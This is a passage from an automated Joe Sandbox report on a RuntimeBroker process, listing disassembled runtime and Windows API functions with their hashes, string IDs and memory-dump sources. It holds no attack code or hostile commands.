                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                • Instruction ID: e8aa95862f049df6bdb488c92c46f8a077187875982a9bd6e7b22285e5271803
                                                                                                                                                                                • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A617232908B8585D732AB19E8807AAB7A4FB85794F444225EBDD03BA5DF7CE190CF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                • Instruction ID: e8dd506dfc603b8a3917fa28343397097fc7c12650f289d89f0e31019f2befc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                • Instruction Fuzzy Hash: 67519F36A082468AEB75AF19D8C4268B698FB54BC4F948136DA9D43FE1CF3CE450CF11
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E
                                                                                                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B3F13
                                                                                                                                                                                • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE0C0B3F23
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                • API String ID: 4108983575-3733052814
                                                                                                                                                                                • Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                                                                                                • Instruction ID: 8ab135c84dd343dc9e8f3002e60e679c223d1be186b1e932e509d8bc8c9d854a
                                                                                                                                                                                • Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                                                                                                • Instruction Fuzzy Hash: 54518D3298869286EB74CF59A46436876A2FF50B84F244136EB9D47BF6CF3CE550C708
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF72B05324C,?,?,00007FF72B053964), ref: 00007FF72B057642
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                • Instruction ID: 670eb64b3ad20e227d6b924cd6b13f2152e80743bbe40f4b4cf199082df6a548
                                                                                                                                                                                • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                • Instruction Fuzzy Hash: E931EA71619AC545FA32AB18EC507EAA254FB44BE0FC04231EE6D43FE5DF2CE6418B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NameName::
                                                                                                                                                                                • String ID: %lf
                                                                                                                                                                                • API String ID: 1333004437-2891890143
                                                                                                                                                                                • Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                                                                                                • Instruction ID: f57b2f61899458790ce20a83e7b6c7e6dd4140f4d12edc1b593d4d09d868d99b
                                                                                                                                                                                • Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A31B772A8C68585EB30CB29E86027A7362FF89784F448131FA9D47765CF3CE502D744
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                • API String ID: 1878133881-2698358428
                                                                                                                                                                                • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                • Instruction ID: 6fdff204d2bd53b1c08c4d5f8845a223bb5b3ed99a58e59af63a3c8d35ed5717
                                                                                                                                                                                • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                • Instruction Fuzzy Hash: 06119072628B8581FB32AB04F865BA9B364FF48784FD05135DA8D47A64DF3CD604CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                • API String ID: 1878133881-653037927
                                                                                                                                                                                • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                • Instruction ID: 0abdf55444c5001ce555d8f4659d7062b50a89355b13298ebedb6696a2452218
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                • Instruction Fuzzy Hash: D9118E62628B8581FA31AB04E865BA9A364FB48784FD05135DA8C17664DF3CD605CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E
                                                                                                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B243E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abortterminate
                                                                                                                                                                                • String ID: MOC$RCC$csm
                                                                                                                                                                                • API String ID: 661698970-2671469338
                                                                                                                                                                                • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                                                                                                • Instruction ID: 80e40d56e8311f2fe6f2d439ff53db1a8aaac500c347d64d0536e2c655296ffe
                                                                                                                                                                                • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF0C236998242C2EB54AF28E18106C7272FF48B40F085431E74803372CF3CD4A0C705
                                                                                                                                                                                APIs
                                                                                                                                                                                • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE0C0BE9F0
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0BEC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE0C0BECF0
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0BEC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE0C0BE9F5), ref: 00007FFE0C0BED3F
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E
                                                                                                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0BEA1A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                                                                                                                                                • String ID: csm$f
                                                                                                                                                                                • API String ID: 2451123448-629598281
                                                                                                                                                                                • Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                                                                                                • Instruction ID: 30e4ab2926e87ab634042fd4b538f69d35292b3d14c45ab8a19cb5907c9a1218
                                                                                                                                                                                • Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                                                                                                • Instruction Fuzzy Hash: D0E02B31CD834280E724EB64F19117C2BA6FF16B50F148034DB5807266CF3CF4A0C209
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                • Instruction ID: 3dae9bfc67ff5a5ed588d57b68934f092cf885b1609d595cee30ffe311b52fe2
                                                                                                                                                                                • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                • Instruction Fuzzy Hash: EED11872B08A8189E722DF6DD8402BC7775FB487D8B944139CE5D97BA9DE38D106C710
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C38C
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C417
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                • Instruction ID: e41ac4792b681674c8542f6d936e68fe1e6478a3726100afa7ef545ad91e4126
                                                                                                                                                                                • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E91B662B0865185F772EF6D9C4037DA7A0FB58B88F94413DDE0E57AA5DE3CD4818B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2943138195-0
                                                                                                                                                                                • Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                                                                                                • Instruction ID: 2e43351a75891442ff925f63d4ced028e038b26d74974efe99a77de33d0f53d4
                                                                                                                                                                                • Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A917A62E48B6689FB11CBA8D8903AC37B2BF04718F504036EF5D276A5DF7CA845C344
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                • Instruction ID: 2330168116842aa06df1145a2fa2800efa90b297ccda609c17d245da7bfe2790
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                • Instruction Fuzzy Hash: AC510572F046118AEB35EF6C9D416BDA7A5EB18398F900139DE1E52AF5DF38E402CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+$NameName::
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 168861036-0
                                                                                                                                                                                • Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                                                                                                • Instruction ID: e2cad230cb467e1900dcce92df41f062823c97d0a41a5473cd119a69b4dc72d3
                                                                                                                                                                                • Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F5168B2A5865699E720CF28E9A03BC37A2BF44B44F548031EB1E077A5DF3DE541D358
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                • Instruction ID: 9d71321bd6c65d40d719e8f776891b42fe228ada2eefde16b2cb41f1114510d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 46518F22F0464189FB61EF79D8503BDA3A1FF48B98F589539DE09477A8DF38D4818B60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2943138195-0
                                                                                                                                                                                • Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                                                                                                • Instruction ID: 05276c9a10fd7affae49822f92b356cf532dddd916686a27907a6fb20391e8ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A416372A08B859AFB01CF68D8953AC37A1BB88B48F548035EB8E67769CF3C9441C314
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                • Instruction ID: c8638e91913230c79782100caf983f588930d4d4a28d6d5b07f2496bcbdb15e2
